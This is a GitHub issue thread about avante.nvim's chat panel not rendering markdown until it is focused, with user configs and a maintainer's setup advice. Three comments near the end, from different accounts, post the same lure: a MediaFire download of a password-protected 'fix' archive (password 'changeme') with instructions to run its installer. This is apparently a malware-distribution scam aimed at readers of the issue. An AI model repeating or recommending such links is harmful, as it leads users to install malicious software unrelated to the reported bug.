### ISSUE TITLE
Markdown not rendering correctly when opening 

### ISSUE THREAD

**Issue by chgara** [yetone/avante.nvim#299]
When opening AvanteAsk it does not render Avante's chat previous messages markdown till you focus the Avante panel.

By default it will focus the AvanteInput, so I cant see the messages formatted till either:
  - Send a message
  - execute :RenderMarkdown
  - or focus in the avante messages part

And this happens every time I open Avante, it does not matter if it is fresh open or not.

I attach a video with the behavior:

https://github.com/user-attachments/assets/ab79d156-9828-440a-b401-f11dcdb431ea

I don't know if this is only happening to me. This is my current config: 
```

    {
        "yetone/avante.nvim",
        event = {"BufReadPre", "BufNewFile"},
        build = "make",
        opts = {
            provider = "copilot",
            hints = { enabled = true },
            windows = {
                width = 25,
                wrap = true,
                sidebar_header = {
                    align = "center",
                    rounded = false,
                },
            }
        },
        dependencies = {
            "nvim-tree/nvim-web-devicons",
            'zbirenbaum/copilot.lua',
            "stevearc/dressing.nvim",
            "nvim-lua/plenary.nvim",
            "MunifTanjim/nui.nvim",
            {
                'MeanderingProgrammer/render-markdown.nvim',
                opts = {
                    enabled = true,
                    file_types = { "markdown", "Avante" },
                },
                ft = { "markdown", "Avante" },
            },
        },
    },

```

I tried also this config and many other things, nothing seems to work

```
    {
        "yetone/avante.nvim",
        lazy = false,
        build = "make",
        config = function ()
            require('avante').setup({
                provider = "copilot",
                hints = { enabled = true },
                windows = {
                    width = 25,
                    wrap = true,
                    sidebar_header = {
                        align = "center",
                        rounded = false,
                    },
                }
            })
            require('render-markdown').enable()
        end,
        dependencies = {
            "nvim-tree/nvim-web-devicons",
            'zbirenbaum/copilot.lua',
            "stevearc/dressing.nvim",
            "nvim-lua/plenary.nvim",
            "MunifTanjim/nui.nvim",
            {
                'MeanderingProgrammer/render-markdown.nvim',
                opts = {
                    enabled = true,
                    file_types = { "markdown", "Avante" },
                },
                ft = { "markdown", "Avante" },
            },
        },
    },
```

**Comment by aarnphm** [comment]
well just set the event to `VeryLazy`. `BufReadPre` is not correct here

```
BufReadPre: When starting to edit a new buffer, before reading the file into the buffer.  Not used if the file doesn't exist.
```

```
BufNewFile: When starting to edit a file that doesn't exist.  Can be used to read in a skeleton file.
```

```
VeryLazy: triggered after `LazyDone` and processing `VimEnter` auto commands
```

If you worry about performance just set lazy=true and gate it behind `cmd = {"AvanteAsk"}`.


Also why do you need to call :RenderMarkdown here?

**Comment by chgara** [comment]
Nono, maybe I haven’t explained my self correctly.

What I mean (and can be sean in the video) is that when opening AvanteAsk, the chat messages appear, but there are not correctly rendered by render-markdown.nvim

And I need to either do one of the mentioned things above to make the plugin render the Avante chat.

I didn’t mean that Avante plugin does not work, I mean that the markdown plugin is not rendering the messages.

Also I have tried with many configs, as I posted one of them, and also with verylazy. So it does not seem to be a configuration thing.

if you see in the video, when I open AvanteAsk the markdown plugin did not render correctly the Avante tab

**Comment by chgara** [comment]
> well just set the event to `VeryLazy`. `BufReadPre` is not correct here
> 
> ```
> BufReadPre: When starting to edit a new buffer, before reading the file into the buffer.  Not used if the file doesn't exist.
> ```
> 
> ```
> BufNewFile: When starting to edit a file that doesn't exist.  Can be used to read in a skeleton file.
> ```
> 
> ```
> VeryLazy: triggered after `LazyDone` and processing `VimEnter` auto commands
> ```
> 
> If you worry about performance just set lazy=true and gate it behind `cmd = {"AvanteAsk"}`.
> 
> Also why do you need to call :RenderMarkdown here?
> 
> Seems to me like a mis usage, not a bug afaik

Nono, maybe I haven’t explained my self correctly.

What I mean (and can be sean in the video) is that when opening AvanteAsk, the chat messages appear, but there are not correctly rendered by render-markdown.nvim

And I need to either do one of the mentioned things above to make the plugin render the Avante chat.

I didn’t mean that Avante plugin does not work, I mean that the markdown plugin is not rendering the messages.

Also I have tried with many configs, as I posted one of them, and also with verylazy. So it does not seem to be a configuration thing.

if you see in the video, when I open AvanteAsk the markdown plugin did not render correctly the Avante tab

**Comment by aarnphm** [comment]
my question is why do you call `require('render-markdown').enable()` in config here?

if you set the file_types in render-markdown the autocmds from that plugins should already setup. You don't have to call config like this manually.

Also you should only use lazy.nvim `config` if you have to, most opts should be done through `opts = {}`

https://github.com/user-attachments/assets/3ddecd7c-ae09-4d06-b226-be7692736872



make sure to read the readme for the setup instruction.

Closed due to not correct setup

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chgara** [comment]
> my question is why do you call `require('render-markdown').enable()` in config here?
> 
> if you set the file_types in render-markdown the autocmds from that plugins should already setup. You don't have to call config like this manually.
> 
> Also you should only use lazy.nvim `config` if you have to, most opts should be done through `opts = {}`
> 
>  Screen.Recording.2024-08-27.at.23.18.39.mov 
> make sure to read the readme for the setup instruction.
> 
> Closed due to not correct setup

this is from the second config that does either not work, this was to try to enable markdown on plugin init, but didnt work

because with the default configuration it does not work, for me it does not do the same thing as you, if you see the video you will see that i am using the default confing and either way the markdown is not being activated like in yours, so i dont know what its not working

with this config, and only the plugin of avante running it does not work either, this is the config that I am using and also a video of it:
```

    {
        'zbirenbaum/copilot.lua',
        -- event = {"BufReadPre", "BufNewFile"},
        lazy = false,
        config = function ()
            require("copilot").setup({
                filetypes = {
                    help = true,
                    markdown = true,
                },
                panel = { enabled = false },
                suggestion = { enabled = false },
            })
        end,
    },
    {
        "yetone/avante.nvim",
        -- event = {"BufReadPre", "BufNewFile"},
        lazy = false,
        build = "make",
        opts = {
            provider = "copilot",
            hints = { enabled = true },
            windows = {
                width = 25,
                wrap = true,
                sidebar_header = {
                    align = "center",
                    rounded = false,
                },
            }
        },
        dependencies = {
            "nvim-tree/nvim-web-devicons",
            'zbirenbaum/copilot.lua',
            "stevearc/dressing.nvim",
            "nvim-lua/plenary.nvim",
            "MunifTanjim/nui.nvim",
            {
                'MeanderingProgrammer/render-markdown.nvim',
                opts = {
                    file_types = { "markdown", "Avante" },
                },
                ft = { "markdown", "Avante" },
            },
        },
    },

```

https://github.com/user-attachments/assets/cda15c5c-64b0-4de9-b669-3e261539fa4a
